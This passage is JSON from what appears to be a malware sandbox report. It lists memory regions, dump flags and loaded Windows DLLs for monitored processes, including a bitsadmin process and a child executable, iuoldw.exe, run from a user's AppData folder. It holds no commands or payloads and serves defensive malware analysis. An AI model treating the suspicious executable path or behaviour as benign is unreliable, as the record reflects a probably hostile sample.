[ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791772954624, "type": "region", "version": 1 }, "end_va": 8791775064063, "entry_point": 8791772954624, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_649", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791772954624, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791778656256, "type": "region", "version": 1 }, "end_va": 8791779119103, "entry_point": 8791778656256, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_650", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791778656256, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791780753408, "type": "region", "version": 1 }, "end_va": 8791781404671, "entry_point": 8791780753408, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_651", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791780753408, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791781408768, "type": "region", "version": 1 }, "end_va": 8791781535743, "entry_point": 8791781408768, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_652", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791781408768, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791781867520, "type": "region", "version": 1 }, "end_va": 8791783100415, "entry_point": 8791781867520, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_653", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791781867520, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_654", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:22.841", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_655", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:22.841", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 917504, "filename": "\\Windows\\System32\\en-US\\bitsadmin.exe.mui", "id": "region_656", "name": "bitsadmin.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:22.841", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000657-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_657", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:22.841", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000658-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_658", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:22.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 6520831, "entry_point": 0, "filename": null, "id": "region_659", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:00:22.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_660", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:00:22.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 29163519, "entry_point": 0, "filename": null, "id": "region_661", "name": "pagefile_0x00000000007d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8192000, "timestamp": "00:00:22.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791767646208, "type": "region", "version": 1 }, "end_va": 8791767834623, "entry_point": 8791767646208, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_662", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791767646208, "timestamp": "00:00:22.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791777017856, "type": "region", "version": 1 }, "end_va": 8791778103295, "entry_point": 8791777017856, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_663", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791777017856, "timestamp": "00:00:22.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4837375, "entry_point": 4325376, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_664", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 4325376, "timestamp": "00:00:22.851", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791746478080, "type": "region", "version": 1 }, "end_va": 8791746539519, "entry_point": 8791746478080, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_666", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791746478080, "timestamp": "00:00:22.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791723802624, "type": "region", "version": 1 }, "end_va": 8791724154879, "entry_point": 8791723802624, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_667", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791723802624, "timestamp": "00:00:22.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000668-addr_0x0000000001bd0000-size_0x0000000000240000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2359296, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 31522815, "entry_point": 0, "filename": null, "id": "region_668", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:00:22.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 30076927, "entry_point": 0, "filename": null, "id": "region_669", "name": "pagefile_0x0000000001bd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29163520, "timestamp": "00:00:22.981", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000670-addr_0x0000000001d90000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31522815, "entry_point": 0, "filename": null, "id": "region_670", "name": "private_0x0000000001d90000", "norm_filename": null, "region_type": "private_memory", "start_va": 30998528, "timestamp": "00:00:22.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_671", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:22.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791776362496, "type": "region", "version": 1 }, "end_va": 8791776989183, "entry_point": 8791776362496, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_672", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791776362496, "timestamp": "00:00:22.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791783112704, "type": "region", "version": 1 }, "end_va": 8791783993343, "entry_point": 8791783112704, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_673", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791783112704, "timestamp": "00:00:22.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_674", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:00:22.989", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000675-addr_0x0000000001f50000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_675", "name": "private_0x0000000001f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 32833536, "timestamp": "00:00:22.995", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000676-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_676", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:00:22.995", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000677-addr_0x0000000001eb0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32702463, "entry_point": 0, "filename": null, "id": "region_677", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:00:22.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791740186624, "type": "region", "version": 1 }, "end_va": 8791740280831, "entry_point": 8791740186624, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_678", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791740186624, "timestamp": "00:00:22.998", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000679-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_679", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:00:22.998", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 282624, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4607999, "entry_point": 4325376, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_680", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 4325376, "timestamp": "00:00:22.999", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791737040896, "type": "region", "version": 1 }, "end_va": 8791737331711, "entry_point": 8791737040896, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_685", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791737040896, "timestamp": "00:00:23.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 36302847, "entry_point": 33357824, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_686", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:00:23.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791747461120, "type": "region", "version": 1 }, "end_va": 8791747543039, "entry_point": 8791747461120, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_687", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791747461120, "timestamp": "00:00:23.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000688-addr_0x0000000001ce0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_688", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:00:23.020", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000689-addr_0x0000000002300000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 36700160, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_689", "name": "private_0x0000000002300000", "norm_filename": null, "region_type": "private_memory", "start_va": 36700160, "timestamp": "00:00:23.020", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000690-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_690", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:00:23.020", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000691-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_691", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:00:23.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791613636608, "type": "region", "version": 1 }, "end_va": 8791613698047, "entry_point": 8791613636608, "filename": "\\Windows\\System32\\qmgrprxy.dll", "id": "region_692", "name": "qmgrprxy.dll", "norm_filename": "c:\\windows\\system32\\qmgrprxy.dll", "region_type": "memory_mapped_file", "start_va": 8791613636608, "timestamp": "00:00:23.626", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000990-addr_0x00000000023c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 38010879, "entry_point": 0, "filename": null, "id": "region_990", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:00:35.615", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000991-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_991", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:00:35.616", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", "filename": "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe", "id": "proc_6", "image_name": "iuoldw.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00001135-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1135", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:16.986", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001136-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:16.986", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1137", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:16.986", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001138-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_1138", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:16.986", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001139-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1139", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:16.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_1140", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:16.987", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001141-addr_0x0000000000400000-size_0x0000000000033000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 208896, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4403199, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", "id": "region_1141", "name": "iuoldw.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:16.987", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1142", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:16.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1143", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:01:16.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1144", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:17.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001145-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_300", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:17.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001146-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1146", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:17.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001147-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1147", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": 